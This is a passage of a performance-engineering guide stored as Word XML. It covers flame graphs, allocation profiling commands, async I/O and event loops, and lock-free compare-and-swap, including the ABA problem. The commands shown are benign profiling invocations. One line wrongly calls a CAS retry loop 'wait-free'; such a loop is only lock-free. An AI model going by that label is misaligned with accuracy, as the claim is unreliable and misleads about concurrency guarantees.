    <w:p w14:paraId="486BF0F8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Long thin towers → deep call stacks with little individual CPU consumption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70082E9C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Framework overhead, boilerplate calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F112AF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Usually not the bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F66685E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="06BE98BF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Plateaus (wide bars at intermediate depth) → hot functions called from many callers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F68C82" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Shared utilities, connection pool, serialization — high-value optimization targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05794F1E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory allocation profiling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DCD6FE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48307E61" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t># Java: JVM allocation profiling with async-profiler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076D1A3F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>java -agentpath:async-profiler.so=start,event=alloc,file=alloc.html MyApp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F948F8A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="0153AB3B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t># Go: pprof heap allocation profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DCA0EC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>go tool pprof http://localhost:6060/debug/pprof/heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081630D7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="565C626F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t># Python: memory_profiler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313921FA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>@profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D93288" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>def my_function():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62748CE1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4D8F26" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Allocation profiling reveals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36795E80" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1444"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Objects allocated at high rate (GC pressure) → optimize to reuse objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692B2918" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1444"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Large objects causing GC pauses → reduce object sizes, use pools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D45A55" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1444"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Memory leaks (objects never freed) → fix reference counting or memory management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A35D5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="4A0AA5A6">
          <v:rect id="_x0000_i5204" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F102D1A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Optimizing Throughput Without Destroying Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9F40E6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Async Processing and Event-Driven Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A89742C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental throughput unlock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463A93CD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Synchronous, blocking I/O limits throughput to concurrency / latency (Little's Law). Non-blocking, async I/O removes this constraint — a single thread can have thousands of outstanding I/O operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5044F4D1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0070CB80" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Synchronous (blocking):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023B8B40" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Thread issues read() → blocks waiting for disk → disk completes → thread continues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4159CE00" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Thread utilization: (processing_time) / (processing_time + I/O_time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D409A5F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  If I/O takes 100× longer than processing: thread is idle 99% of the time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226EFADE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  To achieve 1000 concurrent I/Os: need 1000 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169ACDA6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  1000 threads × 1MB stack: 1GB memory just for thread stacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD01938" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="096450DD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Asynchronous (non-blocking):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687EE7C1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Thread issues async_read() → immediately continues to next task → callback fires when done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678DBD2A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Thread utilization: 100% (always processing a completed I/O or issuing new ones)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439EDD3C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  1 thread can have 100,000 outstanding I/Os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409A0CA1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Memory: 1 thread + async callback state per request (~1KB per request) = 100MB for 100K I/Os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E3616A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The event loop pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1D130C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7090CC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>while true:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256FA8FE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    events = epoll_wait(fd_set, timeout=1ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B2EBAB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    for event in events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3607DF54" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">        if event.type == READABLE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670F7C0B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">            read(event.fd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5816ACBA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">            process_data()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED49A3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">        elif event.type == WRITABLE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422EEBE6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">            write_buffered_data(event.fd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1CAFCC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">        elif event.type == TIMER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7090E565" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">            handle_timeout(event.timer_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BD4E0E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>One thread handles thousands of connections by multiplexing I/O events. This is the model for Nginx, Node.js, Redis, and virtually all high-throughput servers. Latency remains low because the event loop responds to each event immediately — no queuing behind blocked threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56681406" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cooperative scheduling problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D51913" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Event loop threads cannot block. A single CPU-intensive operation blocks the entire event loop — all other connections experience latency spikes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172FD827" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21841986" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Event loop handles request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D3FCD9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Calls JSON.parse(large_payload)  ← CPU-intensive, takes 50ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5698027F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → During these 50ms, no other events are processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A4B108" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → All other connections wait 50ms for their events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69285326" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → p99 latency for all connections spikes by the CPU operation duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0AD170" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7911A075" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1445"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Worker threads:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Offload CPU-intensive work to a thread pool; return result via callback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3445A27D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1445"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Streaming processing:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Process large payloads incrementally (streaming JSON parser) rather than buffering then parsing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E776428" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1445"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time-slicing:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Break long CPU operations into smaller chunks, yield between chunks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A4F0F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lock-Free Data Structures — Throughput Without Lock Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7EE75" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Locks are throughput killers at high concurrency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1713C9A9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1446"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Thread A holds lock → Thread B, C, D... all block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2C12FC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1446"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Context switches (kernel ↔ user space) for each block/unblock: ~5-10µs each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE14F66" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1446"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Cache coherence: lock memory bouncing between CPU cores is expensive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AFCDA7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compare-And-Swap (CAS) — the foundation of lock-free:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57715217" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31670EB4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>// Lock-based increment (serialized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ABDAC4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>mutex.lock()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F48711" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>value++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEE664D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>mutex.unlock()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D76A9E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="4E2216A6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>// CAS-based increment (lock-free)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCBC3B0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>do {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001EE134" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    current = value.load()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB22616" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    new_val = current + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6BFB8D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>} while (!value.compare_exchange(current, new_val))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159E251F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>// If value changed between load and compare_exchange: retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F02C204" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>// If unchanged: atomically write new_val</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DA16A7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The CAS loop retries if a concurrent modification occurred. No blocking — threads that fail the CAS immediately retry rather than sleeping. This is </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wait-free</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> progress (every thread makes progress in a bounded number of steps) at low contention. At high contention, CAS can spin — burning CPU without making progress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A3E09A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ABA problem with CAS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEC6F46" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7275CFE1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Thread A reads value = 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB4E9E5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Thread B changes value: 5 → 3 → 5  (back to 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337DB31C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Thread A's CAS succeeds: value is still 5, CAS sees no change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784D067F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Problem: Thread A proceeds as if nothing happened, but value was modified and restored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFF215C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
